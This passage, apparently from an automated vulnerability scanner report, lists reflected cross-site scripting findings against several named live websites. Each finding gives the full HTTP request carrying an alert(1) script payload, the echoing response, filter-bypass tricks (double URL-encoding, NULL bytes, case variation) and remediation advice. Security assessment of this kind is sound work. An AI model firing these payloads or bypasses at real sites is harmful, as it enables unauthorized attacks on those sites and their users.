The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2 was submitted in the REST URL parameter 4. This input was echoed as 6cd02<script>alert(1)</script>52097846f2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /news/home/20110131005660/en6cd02%253cscript%253ealert%25281%2529%253c%252fscript%253e52097846f2/Stop-Cross-Site-Scripting-Errors-Veracode-Launches-Free/x26amp HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:32 GMT
Server: Apache
Vary: Host
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Set-Cookie: JSESSIONID=YvGzNHMQ2z92nnrBLLJmwQytxMdFy6tyGLKfrSyGKFpNsLslR6dc!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Connection: close
Content-Length: 22342

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>News | Business
...[SNIP]...
<span class="epi-error">Cannot find news for id = 20110131005660 and language = en6cd02<script>alert(1)</script>52097846f2.</span>
...[SNIP]...

1.127. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8658d"><script>alert(1)</script>1914e400a0c was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=201101270061928658d"><script>alert(1)</script>1914e400a0c&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:57 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=sytmNHMKS2CpJk6LCGKzGyGZpQGM91TRRQv9ccQnwhZW8fgbSWBr!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="newsId" value="201101270061928658d"><script>alert(1)</script>1914e400a0c" />
...[SNIP]...

1.128. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c43fd"><script>alert(1)</script>7d138ca5706 was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=enc43fd"><script>alert(1)</script>7d138ca5706&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:50 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=QG6tNHMGcBnMpQ1vTkKYgqp5dcFfpGyBnJvhmMGLRn6nTR224kJn!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10567

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="newsLang" value="enc43fd"><script>alert(1)</script>7d138ca5706" />
...[SNIP]...

1.129. http://www.businesswire.com/portal/site/home/template.BWPOPUP/permalink/ [javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.businesswire.com
Path:   /portal/site/home/template.BWPOPUP/permalink/

Issue detail

The value of the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c2d9"><script>alert(1)</script>7560c4ee1fb was submitted in the javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /portal/site/home/template.BWPOPUP/permalink/?javax.portlet.tpst=c3eb0ec6c81ef7157972709ddb808a0c_ws_MX&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsLang=en&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_viewID=email_release_popup&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_permalink=http%3A%2F%2Fwww.businesswire.com%2Fnews%2Fhome%2F20110127006192%2Fen%2FVeracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming3c2d9"><script>alert(1)</script>7560c4ee1fb&javax.portlet.prp_c3eb0ec6c81ef7157972709ddb808a0c_newsId=20110127006192&beanID=1933350696&viewID=email_release_popup&javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheTok=com.vignette.cachetoken HTTP/1.1
Host: www.businesswire.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=XFs9NGjc0TYgGYXC7TYhwy1BtTBSB1Jjc6lvS2kj0sbkV1hWQVBg!213507156!-2063012567; __utmz=217664773.1296491520.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); VignettePortal-NavTreeState-home=; CLEQ_y=1; __utma=217664773.1981374634.1296491520.1296491520.1296491520.1; CLEQ_a=9574e5bacd98427a978b51a0390d0000.1; __utmc=217664773; __utmb=217664773.1.10.1296491520; CLEQ_t=1;

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 19:24:54 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-cache="set-cookie"
Set-Cookie: JSESSIONID=sVpMNHMHdYbd6kwP6yhTQLkr7sSjKhyj8LxSR0QvF7kcvhx18Lh6!213507156!-2063012567; path=/
Set-Cookie: VignettePortal-NavTreeState-home=; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Vignette-RespondedWith: AJAX
X-Powered-By: Servlet/2.5 JSP/2.1
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 10754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Bus
...[SNIP]...
<input type="hidden" name="permalink" value="http://www.businesswire.com/news/home/20110127006192/en/Veracode-Independent-Analyst-Chenxi-Wang-Lead-Upcoming3c2d9"><script>alert(1)</script>7560c4ee1fb" />
...[SNIP]...

1.130. http://www.dinclinx.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.dinclinx.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8110a<script>alert(1)</script>3ce872fd7a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?s=886&e=0&t=635&f=javascript&8110a<script>alert(1)</script>3ce872fd7a6=1 HTTP/1.1
Host: www.dinclinx.com
Proxy-Connection: keep-alive
Referer: http://www.scmagazineuk.com/microsoft-warns-of-internet-explorer-xss-flaw-in-all-versions-of-windows/article/195310/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 17:14:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 31 Jan 2011 17:14:32 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 69

// Error: Unknown parameter 8110a<script>alert(1)</script>3ce872fd7a6

1.131. http://www.ereadable.com/scripts/browse.asp [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ereadable.com
Path:   /scripts/browse.asp

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass. Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /scripts/browse.asp?ref=0080553400&source=1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343 HTTP/1.1
Host: www.ereadable.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 31 Jan 2011 19:32:25 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Content-Length: 14009
Content-Type: text/html
Set-Cookie: source=1153f%22%3E%3CScRiPt%3Ealert%281%29%3C%2FScRiPt%3E41d7d8c7343; expires=Tue, 31-Jan-2012 00:00:00 GMT; domain=ereadable.com; path=/
Set-Cookie: SESSION%5FID=7D4CE2DC00000F3600004885A4240069004DBACC; domain=ereadable.com; path=/
Cache-control: private


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title>Product not found : eReadable</title>

<meta name="title" content="Product not found" />


<
...[SNIP]...
<a href="/scripts/browse.asp?ref=0080553400&source=1153f"><ScRiPt>alert(1)</ScRiPt>41d7d8c7343">
...[SNIP]...

1.132. http://www.haymarketbusinesssubs.com/subscriptions/ [cat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the cat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199c9"-alert(1)-"ce6460bfe43 was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItem&cat=20199c9"-alert(1)-"ce6460bfe43&itemID=SCWEB09GBP01 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:13 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970753;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/
Set-Cookie: CFTOKEN=55220764;expires=Wed, 23-Jan-2041 19:48:13 GMT;path=/
Set-Cookie: JSESSIONID=5630b9be91597d16c194;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20199C9"-ALERT(1)-"CE6460BFE43&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETT
...[SNIP]...

1.133. http://www.haymarketbusinesssubs.com/subscriptions/ [fuseaction parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the fuseaction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cab60"-alert(1)-"ced730ffdfc was submitted in the fuseaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItemcab60"-alert(1)-"ced730ffdfc&cat=20&itemID=SCWEB09GBP01 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:05 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970737;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/
Set-Cookie: CFTOKEN=86237119;expires=Wed, 23-Jan-2041 19:48:05 GMT;path=/
Set-Cookie: JSESSIONID=5630932a02f217556153;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
URATION VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEMCAB60"-ALERT(1)-"CED730FFDFC&CAT=20&ITEMID=SCWEB09GBP01?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTI
...[SNIP]...

1.134. http://www.haymarketbusinesssubs.com/subscriptions/ [itemID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The value of the itemID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe00"-alert(1)-"a6076651e04 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?fuseaction=viewItem&cat=20&itemID=SCWEB09GBP01bbe00"-alert(1)-"a6076651e04 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:48:21 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970767;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/
Set-Cookie: CFTOKEN=41263314;expires=Wed, 23-Jan-2041 19:48:21 GMT;path=/
Set-Cookie: JSESSIONID=56306b4e7a5963266475;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
t="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?FUSEACTION=VIEWITEM&CAT=20&ITEMID=SCWEB09GBP01BBE00"-ALERT(1)-"A6076651E04?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETTINGS
   hbx.fv="";//F
...[SNIP]...

1.135. http://www.haymarketbusinesssubs.com/subscriptions/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haymarketbusinesssubs.com
Path:   /subscriptions/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad1f9"-alert(1)-"eeb60f51ea4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscriptions/?ad1f9"-alert(1)-"eeb60f51ea4=1 HTTP/1.1
Host: www.haymarketbusinesssubs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Page not found
Set-Cookie: ARPT=MJOJUMS192.168.2.146CKMWQ; path=/
Connection: close
Date: Mon, 31 Jan 2011 19:47:59 GMT
Server: Microsoft-IIS/6.0
X-HMIO-Server: HBIWeb1
X-Powered-By: ASP.NET
Set-Cookie: CFID=970719;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/
Set-Cookie: CFTOKEN=14115562;expires=Wed, 23-Jan-2041 19:47:59 GMT;path=/
Set-Cookie: JSESSIONID=5630cf1f6100301d4d75;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.d
...[SNIP]...
SECTION
   //CONFIGURATION VARIABLES
   hbx.acct="DM5606269AEF84EN3";//ACCOUNT NUMBER(S)
   hbx.pn="404";//PAGE NAME(S)
   hbx.mlc="HSU/MESSAGES/404/HTTP://WWW.HAYMARKETBUSINESSSUBS.COM:80/SUBSCRIPTIONS/?AD1F9"-ALERT(1)-"EEB60F51EA4=1?::REFERER::";//MULTI-LEVEL CONTENT CATEGORY
   hbx.pndef="index.cfm";//DEFAULT PAGE NAME
   hbx.ctdef="full";//DEFAULT CONTENT CATEGORY
   
   //OPTIONAL PAGE VARIABLES
   //ACTION SETTINGS
   hbx.fv="";/
...[SNIP]...

1.136. http://www.installsoftware.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78edb"><script>alert(1)</script>47e97b4e7e6 was submitted in the REST URL parameter 1. This input was echoed as 78edb\"><script>alert(1)</script>47e97b4e7e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico78edb"><script>alert(1)</script>47e97b4e7e6 HTTP/1.1
Host: www.installsoftware.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=21539171.1296503863.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/17; __utma=21539171.1567778877.1296503863.1296503863.1296503863.1; __utmc=21539171; __utmb=21539171.2.10.1296503863; wordpress_test_cookie=WP+Cookie+check

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 20:20:55 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,Cookie,User-Agent
Last-Modified: Mon, 31 Jan 2011 20:20:55 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 44313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/favicon.ico78edb\"><script>alert(1)</script>47e97b4e7e6" type="hidden" />
...[SNIP]...

1.137. http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformation/security_software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /network-security-solutions-obstacles-in-it-transformation/security_software

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fab61"><script>alert(1)</script>ffe87d33d24 was submitted in the REST URL parameter 1. This input was echoed as fab61\"><script>alert(1)</script>ffe87d33d24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /network-security-solutions-obstacles-in-it-transformationfab61"><script>alert(1)</script>ffe87d33d24/security_software HTTP/1.1
Host: www.installsoftware.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 31 Jan 2011 19:48:06 GMT
Server: Apache mod_fcgid/2.3.5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Pingback: http://www.installsoftware.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Cookie,User-Agent,Accept-Encoding
Last-Modified: Mon, 31 Jan 2011 19:48:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
   
...[SNIP]...
<input name="u" id="url" value="http://www.installsoftware.com/network-security-solutions-obstacles-in-it-transformationfab61\"><script>alert(1)</script>ffe87d33d24/security_software" type="hidden" />
...[SNIP]...

1.138. http://www.installsoftware.com/wp-admin/css/colors-fresh.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.installsoftware.com
Path:   /wp-admin/css/colors-fresh.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fb59"><script>alert(1)</script>9ce1fb0d6b9 was submitted in the REST URL parameter 1. This input was echoed as 4fb59\"><script>alert(1)</script>9ce1fb0d6b9 in the application's response.

